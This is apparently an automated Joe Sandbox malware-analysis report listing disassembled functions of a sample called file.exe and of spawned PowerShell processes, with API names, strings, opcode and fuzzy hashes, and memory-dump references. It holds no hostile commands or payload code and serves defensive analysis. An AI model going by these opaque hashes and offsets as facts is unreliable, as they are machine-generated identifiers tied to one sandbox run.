                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: e+000$gfff
                                      • API String ID: 3215553584-3030954782
                                      • Opcode ID: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                      • Instruction ID: c38473fbbc6177c42e1744aaf3cbbe021f5fe4c84802dcaa1a67be277c686a55
                                      • Opcode Fuzzy Hash: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                      • Instruction Fuzzy Hash: 46513862B197C386E7258B35A9413696B91EF80B94F1C82B1D79CD7BD6CF2CE448C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3693C8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                      • String ID: SIZE
                                      • API String ID: 449872665-3243624926
                                      • Opcode ID: b02be524ea474bea70d79719afa614d78c4d7e79a77e3514f285b95cd58c6b42
                                      • Instruction ID: 6f02f641c0f6139fb33bb0e714f1a5bc28b7dbee06a457f41996084eff8005db
                                      • Opcode Fuzzy Hash: b02be524ea474bea70d79719afa614d78c4d7e79a77e3514f285b95cd58c6b42
                                      • Instruction Fuzzy Hash: AD41C462A2868285EE10DF24E4413BD6361EF857A8F584271EB9DEB7D5FE3CD581C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38C240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileModuleName_invalid_parameter_noinfo
                                      • String ID: C:\Users\user\Desktop\file.exe
                                      • API String ID: 3307058713-1957095476
                                      • Opcode ID: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                      • Instruction ID: f5856fc8ed50322f9dc0c6895011f8a67a3aee5c5f103e156be6ba067f111b6a
                                      • Opcode Fuzzy Hash: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                      • Instruction Fuzzy Hash: BC418B32A09A578AEB54DF21E8401BD77A4EF85BD8B5C4075EA4DE7BA5DF3CE4428300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A379AC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$Text$Dialog
                                      • String ID: ASKNEXTVOL
                                      • API String ID: 2638039312-3402441367
                                      • Opcode ID: 11baffdef81b6ddaf834caa36bb86d39819508dd1e3f916a274287401f1775d7
                                      • Instruction ID: c42a9457a39df86ebe3e14a116bd763e871e295e5e9a5dab64fdda5107a2828f
                                      • Opcode Fuzzy Hash: 11baffdef81b6ddaf834caa36bb86d39819508dd1e3f916a274287401f1775d7
                                      • Instruction Fuzzy Hash: C641D622B1CA8682FA509B15E4842B927A1EF8DBC8F5C0275DE4DF7795EE3CE5418340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3695F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_snwprintf
                                      • String ID: $%s$@%s
                                      • API String ID: 2650857296-834177443
                                      • Opcode ID: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                      • Instruction ID: 61d782e92a8768dc13f71d5d427f402235efe861a35dae99332051d0f5a627f2
                                      • Opcode Fuzzy Hash: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                      • Instruction Fuzzy Hash: 7C31B472B19B4685EA50CF66E5406E967A0FF4578CF481072EE0DEBB55EE3CE505C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38EA84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FileHandleType
                                      • String ID: @
                                      • API String ID: 3000768030-2766056989
                                      • Opcode ID: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                      • Instruction ID: 0e1627c637bdd818e4d462f5d229016f7d457c114b01aae16a11996dcefaa877
                                      • Opcode Fuzzy Hash: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                      • Instruction Fuzzy Hash: 95218422A0DA9342EB618B2894901392651EF85B78F3C1375D67FE77D4CE3DE885C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A383FF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65A381CBE), ref: 00007FF65A38403C
                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65A381CBE), ref: 00007FF65A384082
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionFileHeaderRaise
                                      • String ID: csm
                                      • API String ID: 2573137834-1018135373
                                      • Opcode ID: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                      • Instruction ID: 9b1d42dfb2115f286722bf37e6351251cb979ada5efc6ea1281464c9303c1834
                                      • Opcode Fuzzy Hash: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                      • Instruction Fuzzy Hash: CE114F72609B8182EB208F15E54026ABBA5FF88B98F1C4271DF8D97B54DF3CD551CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36E9D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9DF
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65A36E8DB,?,?,?,00007FF65A3645FA,?,?,?), ref: 00007FF65A36E9EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLastObjectSingleWait
                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                      • API String ID: 1211598281-2248577382
                                      • Opcode ID: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                      • Instruction ID: b7606e9113acd906c4c4aa1d8027bd6b67139216ef46373a610886afdf39844e
                                      • Opcode Fuzzy Hash: 54b8b47555da90577a26e8fb1f909d889ddb1753417e6592717e91a991b71306
                                      • Instruction Fuzzy Hash: 9BE0BF71E1980696F640AB35DC465B83711BFA63B8F9C43B1D03EE16F5AF2CA949C341
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36A3FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                      • Instruction ID: f350c87d82d4f7081b296ca1fcbb0508d656382703a4c20136e2c9faf6b0aa08
                                      • Opcode Fuzzy Hash: e3168a20bccc75ec722704d5b9360ecacf73fabbe3432b4ac0f8e016f3fe19b7
                                      • Instruction Fuzzy Hash: 4DD05E91F0960286FF194FB1A84933516605F58B49F4C50B9C80ED63A0EF2CE094C794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:8
                                      Total number of Limit Nodes:1
                                      execution_graph 8175 7ffd9ba1d4f9 8178 7ffd9ba1d549 8175->8178 8176 7ffd9ba1d552 8177 7ffd9ba1d67d CreateFileW 8179 7ffd9ba1d6de 8177->8179 8178->8176 8178->8177 8180 7ffd9ba145ea 8181 7ffd9ba5fc40 GetFileType 8180->8181 8183 7ffd9ba5fcc4 8181->8183

                                      Executed Functions

                                      Function 00007FFD9BA1D4F9 Relevance: 1.7, APIs: 1, Instructions: 244fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1767704062.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: d1bcfe7135ce9708f2cad2d0a56797da16dd20283a5fb6ca2a8388fd9a557cd1
                                      • Instruction ID: 935bc3efb4a46afec8ec748b60cb25656564094a47baad863ff90c8a4a7662bb
                                      • Opcode Fuzzy Hash: d1bcfe7135ce9708f2cad2d0a56797da16dd20283a5fb6ca2a8388fd9a557cd1
                                      • Instruction Fuzzy Hash: 4671F771A0DA484FD758DF6C9856AB97BE0FF59320F0442BEE08DD72A2DB75A8018781
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BA145DA Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 143 7ffd9ba145da-7ffd9ba1d673 147 7ffd9ba1d67d-7ffd9ba1d6dc CreateFileW 143->147 148 7ffd9ba1d675-7ffd9ba1d67a 143->148 149 7ffd9ba1d6de 147->149 150 7ffd9ba1d6e4-7ffd9ba1d70c 147->150 148->147 149->150
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1767704062.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                                      • Instruction ID: 32ea187902ff70f3b2c0cfa09ed30a4dfc0960029bb43002f7b159801641fc20
                                      • Opcode Fuzzy Hash: 70a6e182c92b496d68fc852dc464a6e39a20cdd66db62cea893af21cc4adbfc7
                                      • Instruction Fuzzy Hash: 6D318171A1CA1C9FDB58EF58D845AF977E0FB69321F10422EE04EE3251CB71A8118BC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BA145EA Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 152 7ffd9ba145ea-7ffd9ba5fcc2 GetFileType 156 7ffd9ba5fcc4 152->156 157 7ffd9ba5fcca-7ffd9ba5fcef 152->157 156->157
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1767704062.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9ba10000_powershell.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                                      • Instruction ID: 3d403e2d80afb2a647e3683a313d88d05cb066fdfbaccc41e6e93579fa977108
                                      • Opcode Fuzzy Hash: 9b5c70a5677a51f9417965b1ebe56ccf62e1c00a5684c3df1e35fcb8b3204905
                                      • Instruction Fuzzy Hash: 61219230A08A0C9FDB58EB98C449BFDB7E0FB55321F00422ED04AD3691DB71A816CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAE15DD Relevance: .7, Instructions: 662COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 314 7ffd9bae15dd-7ffd9bae15e7 315 7ffd9bae15e9 314->315 316 7ffd9bae15ee-7ffd9bae15fa 314->316 315->316 317 7ffd9bae15eb 315->317 318 7ffd9bae15fc-7ffd9bae15ff 316->318 317->316 319 7ffd9bae1606-7ffd9bae1617 318->319 320 7ffd9bae1601 318->320 322 7ffd9bae1619 319->322 323 7ffd9bae161e-7ffd9bae162f 319->323 320->319 321 7ffd9bae1603 320->321 321->319 322->323 326 7ffd9bae161b 322->326 324 7ffd9bae1636-7ffd9bae1647 323->324 325 7ffd9bae1631 323->325 328 7ffd9bae1649 324->328 329 7ffd9bae164e-7ffd9bae1661 324->329 325->324 327 7ffd9bae1633 325->327 326->323 327->324 328->329 330 7ffd9bae164b 328->330 329->318 331 7ffd9bae1663-7ffd9bae170f 329->331 330->329 334 7ffd9bae1926-7ffd9bae1984 331->334 335 7ffd9bae1715-7ffd9bae171f 331->335 353 7ffd9bae1986-7ffd9bae19ad 334->353 354 7ffd9bae19af-7ffd9bae19bb 334->354 336 7ffd9bae173b-7ffd9bae1748 335->336 337 7ffd9bae1721-7ffd9bae1739 335->337 343 7ffd9bae18bb-7ffd9bae18c5 336->343 344 7ffd9bae174e-7ffd9bae1751 336->344 337->336 348 7ffd9bae18d8-7ffd9bae1923 343->348 349 7ffd9bae18c7-7ffd9bae18d7 343->349 344->343 347 7ffd9bae1757-7ffd9bae175f 344->347 347->334 351 7ffd9bae1765-7ffd9bae176f 347->351 348->334 355 7ffd9bae1789-7ffd9bae178f 351->355 356 7ffd9bae1771-7ffd9bae177f 351->356 353->354 362 7ffd9bae19c6-7ffd9bae19d7 354->362 355->343 359 7ffd9bae1795-7ffd9bae1798 355->359 356->355 361 7ffd9bae1781-7ffd9bae1787 356->361 363 7ffd9bae179a-7ffd9bae17ad 359->363 364 7ffd9bae17e1 359->364 361->355 374 7ffd9bae19d9 362->374 375 7ffd9bae19e0-7ffd9bae19ef 362->375 363->334 376 7ffd9bae17b3-7ffd9bae17bd 363->376 365 7ffd9bae17e3-7ffd9bae17e5 364->365 365->343 367 7ffd9bae17eb-7ffd9bae17ee 365->367 372 7ffd9bae1805-7ffd9bae1809 367->372 373 7ffd9bae17f0-7ffd9bae17f9 367->373 372->343 385 7ffd9bae180f-7ffd9bae1815 372->385 373->372 374->375 379 7ffd9bae19f8-7ffd9bae1a75 375->379 380 7ffd9bae19f1 375->380 381 7ffd9bae17d6-7ffd9bae17df 376->381 382 7ffd9bae17bf-7ffd9bae17d4 376->382 391 7ffd9bae1ae8-7ffd9bae1af2 379->391 392 7ffd9bae1a77-7ffd9bae1a87 379->392 380->379 381->365 382->381 386 7ffd9bae1817-7ffd9bae1824 385->386 387 7ffd9bae1831-7ffd9bae1837 385->387 386->387 398 7ffd9bae1826-7ffd9bae182f 386->398 393 7ffd9bae1839-7ffd9bae1846 387->393 394 7ffd9bae1853-7ffd9bae1890 387->394 396 7ffd9bae1afc-7ffd9bae1b41 391->396 397 7ffd9bae1af4-7ffd9bae1af9 391->397 404 7ffd9bae1a89-7ffd9bae1a92 392->404 405 7ffd9bae1a94-7ffd9bae1aaa 392->405 393->394 406 7ffd9bae1848-7ffd9bae1851 393->406 418 7ffd9bae18a9-7ffd9bae18ba 394->418 419 7ffd9bae1892-7ffd9bae18a7 394->419 402 7ffd9bae1afa-7ffd9bae1afb 397->402 398->387 404->405 405->402 414 7ffd9bae1aac-7ffd9bae1ae5 405->414 406->394 419->418
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1768397138.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_7ffd9bae0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f60f6b0f68eefd615e04fc8f4e33c20665c5cc63abba2eca55cdac251dce30e7
                                      • Instruction ID: 0b6ac00a7cc9edf59562ff79e4a6b4fdde6f6bb7c05ebff1d032b48f3d788cfc
                                      • Opcode Fuzzy Hash: f60f6b0f68eefd615e04fc8f4e33c20665c5cc63abba2eca55cdac251dce30e7
                                      • Instruction Fuzzy Hash: FC123421B0EBD90FE366977858755B47FE1EFA2210B0A01FBD489C71E3DA589D06C392
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      Function 00007FFD9BA2926C Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1944338278.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9ba20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cbdcfa53505e46d65171549a046905a33b1c1de61acd246c93cd5f99d3abee2d
                                      • Instruction ID: 26566ce5fc4d159cb422b85cb154bbd27be74aa923bf99321c35dfc91dc51004
                                      • Opcode Fuzzy Hash: cbdcfa53505e46d65171549a046905a33b1c1de61acd246c93cd5f99d3abee2d
                                      • Instruction Fuzzy Hash: 25413772A1CB8C4FEB289B5C9C1A6E87BE0FB95720F04427FE44993152CA616945CBC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B90ED40 Relevance: .1, Instructions: 126COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1943636001.00007FFD9B90D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B90D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9b90d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0524068f4aa3598898117d8bd1d470142ce4c4ccf969b2b4222cb9bab9440fb2
                                      • Instruction ID: c25ea70afe3ff01c1c6aea4df263db0ddb380bd71a6c52531e1559151670670a
                                      • Opcode Fuzzy Hash: 0524068f4aa3598898117d8bd1d470142ce4c4ccf969b2b4222cb9bab9440fb2
                                      • Instruction Fuzzy Hash: B841187181EFC45FE7568B2898519623FF0EF52220B1605DFD0C8CB1A3D625A845C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BA29B18 Relevance: .1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1944338278.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9ba20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2014c0978984118f473dd6eebf8474b9c18bd693857d68bb0293dbae8b13e8f3
                                      • Instruction ID: ce60d94e9e2afed1946bee440e791838659b18b768520790cff3fb54b16971ff
                                      • Opcode Fuzzy Hash: 2014c0978984118f473dd6eebf8474b9c18bd693857d68bb0293dbae8b13e8f3
                                      • Instruction Fuzzy Hash: C6213B3190CB4C4FEB58DF9CD84A7EA7BE0EBA6321F04426FD449C3152DA74A45ACB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BA233B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1944338278.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9ba20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                      • Instruction ID: ef0cfff55408565f3f2370646d3c2087cfd556061bc4c6768bd386db64d07b43
                                      • Opcode Fuzzy Hash: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                      • Instruction Fuzzy Hash: B901A73020CB0C4FD748EF0CE051AA5B3E0FB85324F10056DE58AC36A5DB32E882CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAF34E2 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1944993185.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9baf0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7dc7c70ef7557497492cb94d4393afd512173bc8a528b7e135460ba6dff4f3fc
                                      • Instruction ID: 258aed7ffbbc7be8946da3a27d157e1cdace86f4a16fec872ed93282d8ebed5a
                                      • Opcode Fuzzy Hash: 7dc7c70ef7557497492cb94d4393afd512173bc8a528b7e135460ba6dff4f3fc
                                      • Instruction Fuzzy Hash: 46F0BE32B0E6498FDB68EB4CE4518E877E0FF4532071900BAE15DC74B7CA26AC41C744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

